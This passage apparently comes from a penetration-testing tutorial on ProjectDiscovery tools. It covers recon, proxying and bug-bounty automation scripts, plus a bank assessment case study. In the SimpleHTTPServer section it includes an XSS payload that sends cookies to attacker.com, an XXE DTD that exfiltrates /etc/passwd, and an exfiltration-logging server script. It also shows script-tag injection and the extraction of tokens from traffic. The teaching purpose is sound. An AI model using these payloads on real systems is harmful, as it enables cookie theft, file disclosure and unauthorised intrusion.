cat competitor_domains.txt | cdncheck -json > competitor_cdn.json
# CDN distribution analysis
jq -r '.[] | select(.cdn == true) | .provider' competitor_cdn.json | \
sort | uniq -c | sort -nr > cdn_market_share.txt
# Identify self-hosted vs CDN usage
TOTAL_DOMAINS=$(cat competitor_domains.txt | wc -l)
CDN_DOMAINS=$(jq -r '.[] | select(.cdn == true) | .input' competitor_cdn.json | wc -l)
SELF_HOSTED=$((TOTAL_DOMAINS - CDN_DOMAINS))
echo "CDN Usage Analysis:"
echo "Total domains: $TOTAL_DOMAINS"
echo "Using CDN: $CDN_DOMAINS ($(( CDN_DOMAINS * 100 / TOTAL_DOMAINS ))%)"
echo "Self-hosted: $SELF_HOSTED ($(( SELF_HOSTED * 100 / TOTAL_DOMAINS ))%)"
Scenario 3: DDoS Protection Assessment
# Target: Critical business applications
# Objective: Assess DDoS protection capabilities
# Check protection services
cat critical_apps.txt | cdncheck -json | \
jq -r '.[] | [.input, .cdn, .provider, .waf] | @csv' > protection_analysis.csv
# Identify unprotected assets
grep "false" protection_analysis.csv | cut -d',' -f1 > unprotected_assets.txt
# Verify WAF bypass possibilities
cat unprotected_assets.txt | while read domain; do
# Test for direct access
nslookup "$domain" | grep "Address:" | tail -n +2 | cut -d' ' -f2 | \
while read ip; do
curl -H "Host: $domain" "http://$ip" -I 2>/dev/null | head -1
done
done
20. AIx - AI-Powered Security Assistant
Overview
AIx integrates Large Language Models (LLMs) for security analysis, vulnerability assessment, and automated reporting.
Installation
go install -v github.com/projectdiscovery/aix/cmd/aix@latest
Configuration
# Configure OpenAI API key
export OPENAI_API_KEY="your_api_key_here"
# Configure other providers
aix config set provider anthropic
aix config set api_key "your_anthropic_key"
Basic Usage
# Analyze vulnerability scan results
nuclei -u https://target.com -json | aix analyze
# Generate security report
cat scan_results.json | aix report
# Ask security questions
echo "What are the risks of exposed .git directories?" | aix query
Real-World Scenarios
Scenario 1: Automated Vulnerability Analysis
# Target: Web application security assessment
# Objective: Intelligent vulnerability analysis and prioritization
# Run comprehensive scan
nuclei -u https://webapp.com -severity medium,high,critical -json > webapp_vulns.json
# AI-powered analysis
cat webapp_vulns.json | aix analyze --prompt "
Analyze these vulnerability scan results and provide:
1. Risk prioritization based on exploitability
2. Business impact assessment
3. Remediation recommendations
4. Detection evasion indicators
Format the response as a structured security report."
# Generate executive summary
cat webapp_vulns.json | aix summarize --audience executive --format markdown > executive_summary.md
# Technical remediation guide
cat webapp_vulns.json | aix remediate --format technical > remediation_guide.txt
Scenario 2: Threat Intelligence Integration
# Target: Suspicious network activity
# Objective: Contextual threat analysis
# Gather IOCs from security tools
cat suspicious_ips.txt | while read ip; do
echo "IP: $ip"
whois "$ip" | grep -E "(OrgName|Country)"
nmap -sV "$ip" | grep "open"
done > ioc_data.txt
# AI-powered threat analysis
cat ioc_data.txt | aix analyze --prompt "
Analyze these network indicators and provide:
1. Threat actor attribution possibilities
2. Attack pattern identification
3. Recommended defensive measures
4. Additional IOCs to monitor
Consider current threat landscape and TTPs."
# Generate threat report
aix query "Based on the analyzed IOCs, create a threat intelligence report suitable for sharing with other security teams"
Scenario 3: Security Awareness and Training
# Target: Security team education
# Objective: Generate training content from real findings
# Extract unique vulnerability types
jq -r '.["template-id"]' recent_findings.json | sort -u > vuln_types.txt
# Generate training content
cat vuln_types.txt | while read vuln_type; do
aix query "Explain $vuln_type vulnerability in simple terms:
1. What is it?
2. How is it exploited?
3. Real-world impact examples
4. Prevention methods
Format for security awareness training." > "training_$vuln_type.md"
done
# Create security scenarios
aix query "Create 5 realistic security incident scenarios based on common web application vulnerabilities for tabletop exercises"
21. Proxify - HTTP Proxy Tool
Overview
Proxify is a Swiss Army Knife proxy tool for HTTP/HTTPS traffic interception, modification, and analysis during security testing.
Installation
go install -v github.com/projectdiscovery/proxify/cmd/proxify@latest
Basic Usage
# Start proxy server
proxify
# Custom port
proxify -port 8080
# Save traffic to file
proxify -output traffic.txt
# JSON output
proxify -json -output traffic.json
Advanced Features
Traffic Filtering and Modification
# Filter by host
proxify -filter-host "target.com"
# Filter by HTTP methods
proxify -filter-method "POST,PUT"
# Modify requests/responses
proxify -replace-request "oldvalue:newvalue"
# Custom CA certificate
proxify -cert cert.pem -key key.pem
Real-World Scenarios
Scenario 1: API Security Testing
# Target: Mobile application API
# Objective: Intercept and analyze API traffic
# Start proxify with custom configuration
proxify -port 8080 -json -output api_traffic.json &
PROXY_PID=$!
# Configure mobile device to use proxy (manual step)
echo "Configure mobile device proxy: IP:8080"
# Let application generate traffic for 10 minutes
sleep 600
# Stop proxy
kill $PROXY_PID
# Analyze API endpoints
jq -r '.[] | select(.request.method == "POST") | .request.url' api_traffic.json | sort -u > api_endpoints.txt
# Extract authentication tokens
jq -r '.[] | .request.headers.Authorization // empty' api_traffic.json | sort -u > auth_tokens.txt
# Find sensitive data in requests
jq -r '.[] | .request.body' api_traffic.json | grep -E "(password|token|key|secret)" > sensitive_data.txt
Scenario 2: Web Application Security Assessment
# Target: Complex web application
# Objective: Map application flow and identify vulnerabilities
# Start interactive proxy
proxify -port 8080 -verbose &
# Set browser proxy to localhost:8080
# Browse application manually to generate traffic
# Extract all unique URLs
grep -oP 'https?://[^"\s]+' proxify.log | sort -u > discovered_urls.txt
# Identify form submissions
grep "POST" proxify.log | grep -oP 'https?://[^"\s]+' > form_endpoints.txt
# Test discovered endpoints with Nuclei
cat discovered_urls.txt | nuclei -t exposures/ -t vulnerabilities/
# Parameter extraction for fuzzing
grep -oP '\?[^"\s&]+' proxify.log | cut -d'=' -f1 | sort -u > parameters.txt
Scenario 3: Bug Bounty Traffic Analysis
# Target: Bug bounty program
# Objective: Systematic traffic analysis and vulnerability discovery
#!/bin/bash
# Script: bugbounty_proxy_analysis.sh
PROGRAM_NAME=$1
PROXY_PORT=8080
# Start proxify with comprehensive logging
proxify -port $PROXY_PORT -json -output "${PROGRAM_NAME}_traffic.json" -verbose &
PROXY_PID=$!
echo "Proxy started on port $PROXY_PORT"
echo "Configure browser proxy and browse target application"
echo "Press ENTER when traffic collection is complete"
read
# Stop proxy
kill $PROXY_PID
# Analysis phase
echo "Analyzing captured traffic..."
# Extract all endpoints
jq -r '.[] | .request.url' "${PROGRAM_NAME}_traffic.json" | sort -u > "${PROGRAM_NAME}_endpoints.txt"
# Find potential IDOR vulnerabilities
jq -r '.[] | select(.request.url | contains("id=") or contains("user=") or contains("account=")) | .request.url' "${PROGRAM_NAME}_traffic.json" > idor_candidates.txt
# Extract API endpoints
jq -r '.[] | select(.request.url | contains("/api/") or contains("/v1/") or contains("/v2/")) | .request.url' "${PROGRAM_NAME}_traffic.json" > api_endpoints.txt
# Find file upload endpoints
jq -r '.[] | select(.request.headers["Content-Type"] | test("multipart/form-data")) | .request.url' "${PROGRAM_NAME}_traffic.json" > upload_endpoints.txt
# Extract cookies and sessions
jq -r '.[] | .request.headers.Cookie // empty' "${PROGRAM_NAME}_traffic.json" | sort -u > session_tokens.txt
# Generate report
cat > "${PROGRAM_NAME}_analysis_report.md" << EOF
# Traffic Analysis Report - $PROGRAM_NAME
## Summary
- Total requests captured: $(cat "${PROGRAM_NAME}_traffic.json" | jq length)
- Unique endpoints: $(cat "${PROGRAM_NAME}_endpoints.txt" | wc -l)
- API endpoints: $(cat api_endpoints.txt | wc -l)
- IDOR candidates: $(cat idor_candidates.txt | wc -l)
- Upload endpoints: $(cat upload_endpoints.txt | wc -l)
## Next Steps
1. Test IDOR candidates with different user contexts
2. Analyze API endpoints for authorization bypasses
3. Test file upload functionality for unrestricted uploads
4. Analyze session management for weaknesses
EOF
echo "Analysis complete. Check ${PROGRAM_NAME}_analysis_report.md"
Advanced Integration
Proxify + Nuclei Integration
# Capture traffic and immediately test with Nuclei
proxify -output traffic.txt &
PROXY_PID=$!
# ... perform manual testing ...
kill $PROXY_PID
# Extract URLs and test
grep -oP 'https?://[^"\s]+' traffic.txt | sort -u | nuclei -t exposures/
Custom Request Modification
# Add custom headers to all requests
proxify -replace-request "User-Agent:CustomSecurityScanner/1.0"
# Inject XSS payloads into parameters
proxify -replace-request "param=value:param=<script>alert(1)</script>"
22. SimpleHTTPServer - Enhanced HTTP Server
Overview
SimpleHTTPServer is an enhanced Go version of Python's SimpleHTTPServer with additional security testing features.
Installation
go install -v github.com/projectdiscovery/simplehttpserver/cmd/simplehttpserver@latest
Basic Usage
# Start server on port 8080
simplehttpserver
# Custom port and directory
simplehttpserver -port 9000 -directory /var/www
# Enable HTTPS
simplehttpserver -https -cert cert.pem -key key.pem
Real-World Scenarios
Scenario 1: Payload Hosting for Security Testing
# Target: Cross-site scripting (XSS) testing
# Objective: Host malicious payloads for testing
# Create payload directory
mkdir -p payloads/{xss,ssrf,xxe}
# XSS payloads
cat > payloads/xss/payload.js << 'EOF'
// XSS payload for testing
document.location='http://attacker.com/steal?cookie='+document.cookie;
EOF
# SSRF payloads
cat > payloads/ssrf/test.txt << 'EOF'
SSRF test file - if you can read this, SSRF exists
EOF
# XXE payloads
cat > payloads/xxe/external.dtd << 'EOF'
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/exfil?data=%file;'>">
%eval;
%exfiltrate;
EOF
# Start server
simplehttpserver -port 8000 -directory payloads -log requests.log &
# Use in testing
echo "<script src='http://your-server:8000/xss/payload.js'></script>" > xss_test.html
Scenario 2: Exfiltration Server for Data Leakage Testing
# Target: Data exfiltration testing
# Objective: Capture exfiltrated data during security testing
#!/bin/bash
# Script: exfiltration_server.sh
mkdir -p exfil_data
cd exfil_data
# Start logging server
simplehttpserver -port 8000 -log ../exfil.log &
SERVER_PID=$!
echo "Exfiltration server started on port 8000"
echo "Use the following URLs for testing:"
echo " HTTP: http://your-server:8000/data?leaked=DATA"
echo " DNS: your-server.com (for DNS exfiltration)"
# Monitor for exfiltrated data
tail -f ../exfil.log | while read line; do
if [[ $line == *"GET"* ]]; then
TIMESTAMP=$(date '+%Y-%m-%d %H:%M:%S')
SOURCE_IP=$(echo "$line" | grep -oP '\d+\.\d+\.\d+\.\d+')
LEAKED_DATA=$(echo "$line" | grep -oP '(?<=leaked=)[^&\s]*')
if [ ! -z "$LEAKED_DATA" ]; then
echo "[$TIMESTAMP] Data leaked from $SOURCE_IP: $LEAKED_DATA"
echo "[$TIMESTAMP] $SOURCE_IP: $LEAKED_DATA" >> leaked_data.txt
fi
fi
done &
# Cleanup function
cleanup() {
kill $SERVER_PID 2>/dev/null
kill $! 2>/dev/null
echo "Exfiltration server stopped"
}
trap cleanup EXIT
read -p "Press ENTER to stop the exfiltration server"
Advanced Workflows
Multi-Tool Integration Pipelines
Comprehensive Asset Discovery Pipeline
#!/bin/bash
# Script: comprehensive_asset_discovery.sh
TARGET_DOMAIN=$1
OUTPUT_DIR="results_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
echo "🎯 Starting comprehensive asset discovery for $TARGET_DOMAIN"
# Phase 1: Subdomain Discovery
echo "📡 Phase 1: Subdomain Discovery"
subfinder -d "$TARGET_DOMAIN" -silent > "$OUTPUT_DIR/subdomains_passive.txt"
echo " Passive subdomains: $(cat "$OUTPUT_DIR/subdomains_passive.txt" | wc -l)"
# Generate wordlist with alterx
echo -e "api\ndev\ntest\nstaging\nadmin\nportal" | alterx > "$OUTPUT_DIR/custom_wordlist.txt"
# Active subdomain brute-forcing
shuffledns -d "$TARGET_DOMAIN" -w "$OUTPUT_DIR/custom_wordlist.txt" -silent > "$OUTPUT_DIR/subdomains_active.txt"
echo " Active subdomains: $(cat "$OUTPUT_DIR/subdomains_active.txt" | wc -l)"
# Combine and deduplicate
cat "$OUTPUT_DIR/subdomains_passive.txt" "$OUTPUT_DIR/subdomains_active.txt" | sort -u > "$OUTPUT_DIR/all_subdomains.txt"
echo " Total unique subdomains: $(cat "$OUTPUT_DIR/all_subdomains.txt" | wc -l)"
# Phase 2: Live Host Discovery
echo "🔍 Phase 2: Live Host Discovery"
cat "$OUTPUT_DIR/all_subdomains.txt" | httpx -silent > "$OUTPUT_DIR/live_hosts.txt"
echo " Live hosts: $(cat "$OUTPUT_DIR/live_hosts.txt" | wc -l)"
# Phase 3: Technology Detection
echo "🛠️ Phase 3: Technology Detection"
cat "$OUTPUT_DIR/live_hosts.txt" | httpx -tech-detect -json > "$OUTPUT_DIR/technology_stack.json"
# Extract technologies
jq -r '.[] | [.url, .tech[]] | @csv' "$OUTPUT_DIR/technology_stack.json" 2>/dev/null > "$OUTPUT_DIR/technologies.csv"
# Phase 4: Port Scanning
echo "🔎 Phase 4: Port Scanning"
cat "$OUTPUT_DIR/all_subdomains.txt" | dnsx -silent -a | cut -d' ' -f2 | sort -u > "$OUTPUT_DIR/resolved_ips.txt"
naabu -list "$OUTPUT_DIR/resolved_ips.txt" -top-ports 1000 -silent > "$OUTPUT_DIR/open_ports.txt"
# Phase 5: Web Crawling
echo "🕷️ Phase 5: Web Crawling"
cat "$OUTPUT_DIR/live_hosts.txt" | head -20 | katana -depth 2 -silent > "$OUTPUT_DIR/crawled_urls.txt"
# Phase 6: Vulnerability Scanning
echo "🛡️ Phase 6: Vulnerability Scanning"
cat "$OUTPUT_DIR/live_hosts.txt" | nuclei -t exposures/ -t misconfiguration/ -silent -json > "$OUTPUT_DIR/vulnerabilities.json"
# Generate Summary Report
cat > "$OUTPUT_DIR/summary_report.md" << EOF
# Asset Discovery Summary Report
**Target:** $TARGET_DOMAIN
**Date:** $(date)
## Discovered Assets
- **Subdomains:** $(cat "$OUTPUT_DIR/all_subdomains.txt" | wc -l)
- **Live Hosts:** $(cat "$OUTPUT_DIR/live_hosts.txt" | wc -l)
- **Unique IPs:** $(cat "$OUTPUT_DIR/resolved_ips.txt" | wc -l)
- **Open Ports:** $(cat "$OUTPUT_DIR/open_ports.txt" | wc -l)
- **Crawled URLs:** $(cat "$OUTPUT_DIR/crawled_urls.txt" | wc -l)
- **Vulnerabilities:** $(jq length "$OUTPUT_DIR/vulnerabilities.json" 2>/dev/null || echo "0")
## Top Technologies
$(cut -d',' -f2 "$OUTPUT_DIR/technologies.csv" 2>/dev/null | sort | uniq -c | sort -nr | head -10)
## Critical Findings
$(jq -r '.[] | select(.info.severity == "critical") | "- " + .info.name + " (" + .host + ")"' "$OUTPUT_DIR/vulnerabilities.json" 2>/dev/null)
## High Priority Targets
$(grep -E "(admin|login|portal|dashboard|api)" "$OUTPUT_DIR/live_hosts.txt" | head -10)
EOF
echo "✅ Discovery complete! Results saved in $OUTPUT_DIR/"
echo "📊 Summary report: $OUTPUT_DIR/summary_report.md"
Continuous Security Monitoring Pipeline
#!/bin/bash
# Script: continuous_security_monitoring.sh
TARGETS_FILE="$1"
MONITORING_DIR="monitoring_$(date +%Y%m%d)"
ALERT_THRESHOLD=3
mkdir -p "$MONITORING_DIR"/{daily,alerts,trends}
while true; do
DATE=$(date +%Y%m%d_%H%M)
DAILY_DIR="$MONITORING_DIR/daily/$DATE"
mkdir -p "$DAILY_DIR"
echo "🔄 Starting monitoring cycle at $(date)"
# Asset Discovery Changes
cat "$TARGETS_FILE" | while read domain; do
subfinder -d "$domain" -silent > "$DAILY_DIR/${domain}_subdomains.txt"
# Compare with previous day
PREV_FILE="$MONITORING_DIR/daily/$(date -d yesterday +%Y%m%d)*/${domain}_subdomains.txt"
if ls $PREV_FILE 2>/dev/null; then
comm -13 <(cat $PREV_FILE | sort) <(sort "$DAILY_DIR/${domain}_subdomains.txt") > "$DAILY_DIR/${domain}_new_assets.txt"
if [ -s "$DAILY_DIR/${domain}_new_assets.txt" ]; then
echo "🆕 New assets for $domain:" | tee -a "$MONITORING_DIR/alerts/asset_changes.log"
cat "$DAILY_DIR/${domain}_new_assets.txt" | tee -a "$MONITORING_DIR/alerts/asset_changes.log"
fi
fi
done
# Vulnerability Monitoring
cat "$TARGETS_FILE" | httpx -silent | nuclei -severity high,critical -json > "$DAILY_DIR/vulnerabilities.json"
VULN_COUNT=$(jq length "$DAILY_DIR/vulnerabilities.json")
if [ "$VULN_COUNT" -gt "$ALERT_THRESHOLD" ]; then
echo "🚨 High vulnerability count detected: $VULN_COUNT" | tee -a "$MONITORING_DIR/alerts/vulnerability_spike.log"
jq -r '.[] | "- " + .info.name + " (" + .host + ")"' "$DAILY_DIR/vulnerabilities.json" | tee -a "$MONITORING_DIR/alerts/vulnerability_spike.log"
fi
# Certificate Monitoring
cat "$TARGETS_FILE" | httpx -silent | tlsx -cert -expiry -json > "$DAILY_DIR/certificates.json"
# Check for expiring certificates (30 days)
jq -r '.[] | select(.cert_expiry != null) | [.host, .cert_expiry] | @csv' "$DAILY_DIR/certificates.json" | \
while IFS=, read host expiry; do
expiry_timestamp=$(date -d "$expiry" +%s)
current_timestamp=$(date +%s)
days_until_expiry=$(( (expiry_timestamp - current_timestamp) / 86400 ))
if [ "$days_until_expiry" -lt 30 ]; then
echo "⏰ Certificate expiring soon: $host ($days_until_expiry days)" | tee -a "$MONITORING_DIR/alerts/cert_expiry.log"
fi
done
# Generate trends
echo "$DATE,$VULN_COUNT" >> "$MONITORING_DIR/trends/vulnerability_trend.csv"
sleep 3600 # Wait 1 hour
done
Bug Bounty Automation Pipeline
#!/bin/bash
# Script: bugbounty_automation.sh
PROGRAM_NAME="$1"
SCOPE_FILE="$2"
OUTPUT_DIR="bugbounty_${PROGRAM_NAME}_$(date +%Y%m%d)"
mkdir -p "$OUTPUT_DIR"/{reconnaissance,analysis,exploitation,reporting}
echo "🎯 Starting bug bounty automation for $PROGRAM_NAME"
# Phase 1: Comprehensive Reconnaissance
echo "📡 Phase 1: Reconnaissance"
cat "$SCOPE_FILE" | while read scope; do
echo " 🔍 Processing scope: $scope"
# Subdomain discovery
subfinder -d "$scope" -silent | tee -a "$OUTPUT_DIR/reconnaissance/all_subdomains.txt"
# Cloud asset discovery
if [[ "$scope" == *.* ]]; then
cloudlist -provider aws -domain "$scope" 2>/dev/null | tee -a "$OUTPUT_DIR/reconnaissance/cloud_assets.txt"
fi
# Historical data
chaos -d "$scope" -silent 2>/dev/null | tee -a "$OUTPUT_DIR/reconnaissance/historical_subdomains.txt"
done
# Deduplicate and resolve
sort -u "$OUTPUT_DIR/reconnaissance/all_subdomains.txt" > "$OUTPUT_DIR/reconnaissance/unique_subdomains.txt"
cat "$OUTPUT_DIR/reconnaissance/unique_subdomains.txt" | httpx -silent > "$OUTPUT_DIR/reconnaissance/live_targets.txt"
echo " 📊 Discovered $(cat "$OUTPUT_DIR/reconnaissance/unique_subdomains.txt" | wc -l) subdomains"
echo " ✅ $(cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | wc -l) live targets"
# Phase 2: Technology Analysis
echo "🛠️ Phase 2: Technology Analysis"
cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | httpx -tech-detect -title -status-code -json > "$OUTPUT_DIR/analysis/technology_fingerprint.json"
# Extract interesting technologies
jq -r '.[] | select(.tech != null) | [.url, .tech[]] | @csv' "$OUTPUT_DIR/analysis/technology_fingerprint.json" > "$OUTPUT_DIR/analysis/tech_stack.csv"
# Identify high-value targets
grep -E "(admin|login|portal|dashboard|api|dev|staging|test)" "$OUTPUT_DIR/reconnaissance/live_targets.txt" > "$OUTPUT_DIR/analysis/high_value_targets.txt"
# Phase 3: Vulnerability Discovery
echo "🛡️ Phase 3: Vulnerability Discovery"
# General vulnerability scanning
cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | nuclei -t exposures/ -t misconfiguration/ -severity medium,high,critical -json > "$OUTPUT_DIR/exploitation/general_vulns.json"
# Technology-specific scanning
jq -r '.tech[]?' "$OUTPUT_DIR/analysis/technology_fingerprint.json" | sort -u | while read tech; do
echo " 🔎 Scanning for $tech vulnerabilities"
cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | nuclei -t "technologies/$tech" -json >> "$OUTPUT_DIR/exploitation/tech_specific_vulns.json" 2>/dev/null
done
# Web crawling for additional attack surface
echo "🕷️ Phase 4: Deep Crawling"
cat "$OUTPUT_DIR/analysis/high_value_targets.txt" | head -10 | katana -depth 3 -js-crawl -output "$OUTPUT_DIR/analysis/crawled_endpoints.txt"
# Look for sensitive files
echo "📁 Phase 5: Sensitive File Discovery"
cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | httpx -path "/.git/config,/.env,/config.json,/swagger.json,/.aws/credentials" -mc 200 > "$OUTPUT_DIR/exploitation/sensitive_files.txt"
# Phase 6: Report Generation
echo "📋 Phase 6: Report Generation"
# Count findings
TOTAL_VULNS=$(jq length "$OUTPUT_DIR/exploitation/general_vulns.json" 2>/dev/null || echo "0")
CRITICAL_VULNS=$(jq '[.[] | select(.info.severity == "critical")] | length' "$OUTPUT_DIR/exploitation/general_vulns.json" 2>/dev/null || echo "0")
HIGH_VULNS=$(jq '[.[] | select(.info.severity == "high")] | length' "$OUTPUT_DIR/exploitation/general_vulns.json" 2>/dev/null || echo "0")
SENSITIVE_FILES=$(cat "$OUTPUT_DIR/exploitation/sensitive_files.txt" | wc -l)
# Generate executive summary
cat > "$OUTPUT_DIR/reporting/executive_summary.md" << EOF
# Bug Bounty Assessment - $PROGRAM_NAME
**Assessment Date:** $(date)
**Scope:** $(cat "$SCOPE_FILE" | wc -l) domains
**Methodology:** Automated reconnaissance and vulnerability assessment
## Executive Summary
### Asset Discovery
- **Total Subdomains:** $(cat "$OUTPUT_DIR/reconnaissance/unique_subdomains.txt" | wc -l)
- **Live Web Services:** $(cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | wc -l)
- **High-Value Targets:** $(cat "$OUTPUT_DIR/analysis/high_value_targets.txt" | wc -l)
### Security Findings
- **Total Vulnerabilities:** $TOTAL_VULNS
- **Critical:** $CRITICAL_VULNS
- **High:** $HIGH_VULNS
- **Sensitive Files Exposed:** $SENSITIVE_FILES
### Top Vulnerabilities
$(jq -r '.[] | select(.info.severity == "critical" or .info.severity == "high") | "- **" + .info.name + "** (" + .host + ")"' "$OUTPUT_DIR/exploitation/general_vulns.json" 2>/dev/null | head -10)
### Recommendations
1. Immediate attention required for critical and high-severity vulnerabilities
2. Review and secure exposed sensitive files
3. Implement proper access controls on administrative interfaces
4. Regular security assessments for discovered assets
## Detailed Findings
$(jq -r '.[] | "### " + .info.name + "\n**Severity:** " + .info.severity + "\n**Host:** " + .host + "\n**Description:** " + .info.description + "\n"' "$OUTPUT_DIR/exploitation/general_vulns.json" 2>/dev/null)
EOF
echo "✅ Bug bounty automation complete!"
echo "📊 Results saved in $OUTPUT_DIR/"
echo "📋 Executive summary: $OUTPUT_DIR/reporting/executive_summary.md"
# Optional: Send notification
if command -v notify &> /dev/null; then
echo "Bug bounty scan complete for $PROGRAM_NAME. Found $TOTAL_VULNS vulnerabilities ($CRITICAL_VULNS critical, $HIGH_VULNS high)" | notify -provider slack
fi
Real-World Case Studies
Case Study 1: Fortune 500 Financial Institution Assessment
Background: A major financial institution required a comprehensive security assessment of their digital infrastructure including web applications, APIs, and cloud services.
Scope:
- 50+ primary domains
- Cloud infrastructure across AWS, Azure, and GCP
- Mobile banking applications
- Partner integrations
Methodology:
#!/bin/bash
# Case Study 1: Financial Institution Assessment
COMPANY="megabank"
SCOPE_FILE="megabank_scope.txt"
RESULTS_DIR="assessment_${COMPANY}_$(date +%Y%m%d)"
mkdir -p "$RESULTS_DIR"/{discovery,enumeration,vulnerabilities,compliance,reporting}
echo "🏦 Starting comprehensive assessment for $COMPANY"
# Phase 1: Asset Discovery
echo "📡 Phase 1: Comprehensive Asset Discovery"
# Primary domain enumeration
cat "$SCOPE_FILE" | while read domain; do
echo " Processing $domain"
# Passive reconnaissance
subfinder -d "$domain" -all -silent >> "$RESULTS_DIR/discovery/all_subdomains.txt"
# Certificate transparency logs
chaos -d "$domain" -silent >> "$RESULTS_DIR/discovery/ct_logs.txt"
# ASN enumeration for comprehensive IP mapping
asnmap -org "$(whois $domain | grep -i 'org-name' | cut -d':' -f2 | xargs)" -silent >> "$RESULTS_DIR/discovery/corporate_ips.txt"
done
# Cloud asset discovery
cloudlist -json > "$RESULTS_DIR/discovery/cloud_assets.json"
# Deduplicate and resolve
sort -u "$RESULTS_DIR/discovery/all_subdomains.txt" > "$RESULTS_DIR/discovery/unique_subdomains.txt"
cat "$RESULTS_DIR/discovery/unique_subdomains.txt" | httpx -silent -threads 50 > "$RESULTS_DIR/discovery/live_web_services.txt"
echo " 📊 Discovered $(cat "$RESULTS_DIR/discovery/unique_subdomains.txt" | wc -l) unique subdomains"
echo " ✅ $(cat "$RESULTS_DIR/discovery/live_web_services.txt" | wc -l) live web services"
# Phase 2: Service Enumeration
echo "🔍 Phase 2: Service Enumeration"
# Port scanning on corporate IP ranges
cat "$RESULTS_DIR/discovery/corporate_ips.txt" | naabu -top-ports 1000 -rate 1000 -silent > "$RESULTS_DIR/enumeration/open_ports.txt"
# Web technology fingerprinting
cat "$RESULTS_DIR/discovery/live_web_services.txt" | httpx -tech-detect -title -status-code -content-length -json > "$RESULTS_DIR/enumeration/web_fingerprint.json"
# SSL/TLS analysis for compliance
cat "$RESULTS_DIR/discovery/live_web_services.txt" | tlsx -cert -cipher -tls-version -json > "$RESULTS_DIR/enumeration/ssl_analysis.json"
# API discovery
grep -E "(api|rest|graphql|v1|v2|v3)" "$RESULTS_DIR/discovery/live_web_services.txt" > "$RESULTS_DIR/enumeration/api_endpoints.txt"
# Phase 3: Security Assessment
echo "🛡️ Phase 3: Security Assessment"
# Critical infrastructure scanning
cat "$RESULTS_DIR/discovery/live_web_services.txt" | nuclei -t cves/ -t exposures/ -t misconfiguration/ -severity high,critical -json > "$RESULTS_DIR/vulnerabilities/critical_issues.json"
# Financial services specific checks
cat "$RESULTS_DIR/discovery/live_web_services.txt" | nuclei -t "technologies/banking" -t "exposures/configs" -json > "$RESULTS_DIR/vulnerabilities/financial_specific.json"
# API security testing
if [ -s "$RESULTS_DIR/enumeration/api_endpoints.txt" ]; then
cat "$RESULTS_DIR/enumeration/api_endpoints.txt" | nuclei -t "exposures/apis" -t "misconfiguration/apis" -json > "$RESULTS_DIR/vulnerabilities/api_issues.json"
fi
# Default credential testing on administrative interfaces
grep -E "(admin|login|portal|console)" "$RESULTS_DIR/discovery/live_web_services.txt" | nuclei -t "default-logins/" -json > "$RESULTS_DIR/vulnerabilities/default_creds.json"
# Phase 4: Compliance Assessment
echo "📋 Phase 4: Compliance Assessment"
# TLS compliance (PCI DSS requirements)
jq -r '.[] | select(.tls_version != null) | [.host, .tls_version] | @csv' "$RESULTS_DIR/enumeration/ssl_analysis.json" | \
while IFS=, read host version; do
if [[ "$version" != *"1.2"* ]] && [[ "$version" != *"1.3"* ]]; then
echo "$host,$version,NON_COMPLIANT" >> "$RESULTS_DIR/compliance/tls_compliance.csv"
fi
done
# Certificate expiry tracking
jq -r '.[] | select(.cert_expiry != null) | [.host, .cert_expiry] | @csv' "$RESULTS_DIR/enumeration/ssl_analysis.json" | \
while IFS=, read host expiry; do
expiry_timestamp=$(date -d "$expiry" +%s)
current_timestamp=$(date +%s)
days_until_expiry=$(( (expiry_timestamp - current_timestamp) / 86400 ))
if [ "$days_until_expiry" -lt 90 ]; then
echo "$host,$expiry,$days_until_expiry,EXPIRING_SOON" >> "$RESULTS_DIR/compliance/certificate_expiry.csv"
fi
done
# Security headers compliance
cat "$RESULTS_DIR/discovery/live_web_services.txt" | httpx -response-headers -json | \
jq -r '.[] | [.url, (.headers["strict-transport-security"] // "MISSING"), (.headers["content-security-policy"] // "MISSING"), (.headers["x-frame-options"] // "MISSING")] | @csv' > "$RESULTS_DIR/compliance/security_headers.csv"
# Phase 5: Risk Analysis and Reporting
echo "📊 Phase 5: Risk Analysis and Reporting"
# Calculate risk metrics
TOTAL_ASSETS=$(cat "$RESULTS_DIR/discovery/live_web_services.txt" | wc -l)
CRITICAL_VULNS=$(jq '[.[] | select(.info.severity == "critical")] | length' "$RESULTS_DIR/vulnerabilities/critical_issues.json")
HIGH_VULNS=$(jq '[.[] | select(.info.severity == "high")] | length' "$RESULTS_DIR/vulnerabilities/critical_issues.json")
TLS_VIOLATIONS=$(grep "NON_COMPLIANT" "$RESULTS_DIR/compliance/tls_compliance.csv" | wc -l)
EXPIRING_CERTS=$(grep "EXPIRING_SOON" "$RESULTS_DIR/compliance/certificate_expiry.csv" | wc -l)
# Generate executive report
cat > "$RESULTS_DIR/reporting/executive_summary.md" << EOF
# Security Assessment Executive Summary
## $COMPANY Financial Institution
**Assessment Date:** $(date)
**Scope:** $(cat "$SCOPE_FILE" | wc -l) primary domains
**Methodology:** Comprehensive automated security assessment
---
### 🎯 Assessment Scope
- **Web Applications:** $TOTAL_ASSETS discovered
- **Cloud Infrastructure:** AWS, Azure, GCP
- **API Endpoints:** $(cat "$RESULTS_DIR/enumeration/api_endpoints.txt" | wc -l)
- **Corporate IP Ranges:** $(cat "$RESULTS_DIR/discovery/corporate_ips.txt" | wc -l)
### 🚨 Critical Findings
- **Critical Vulnerabilities:** $CRITICAL_VULNS
- **High-Risk Issues:** $HIGH_VULNS
- **TLS Compliance Violations:** $TLS_VIOLATIONS
- **Certificates Expiring Soon:** $EXPIRING_CERTS
### 📈 Risk Profile
$(if [ "$CRITICAL_VULNS" -gt 0 ]; then echo "**CRITICAL RISK** - Immediate remediation required"; elif [ "$HIGH_VULNS" -gt 5 ]; then echo "**HIGH RISK** - Urgent attention needed"; else echo "**MODERATE RISK** - Standard remediation timeline"; fi)
### 🔍 Key Vulnerabilities
$(jq -r '.[] | select(.info.severity == "critical") | "- **" + .info.name + "** affecting " + .host' "$RESULTS_DIR/vulnerabilities/critical_issues.json" | head -5)
### 📋 Compliance Status
| Requirement | Status | Issues |
|-------------|--------|--------|
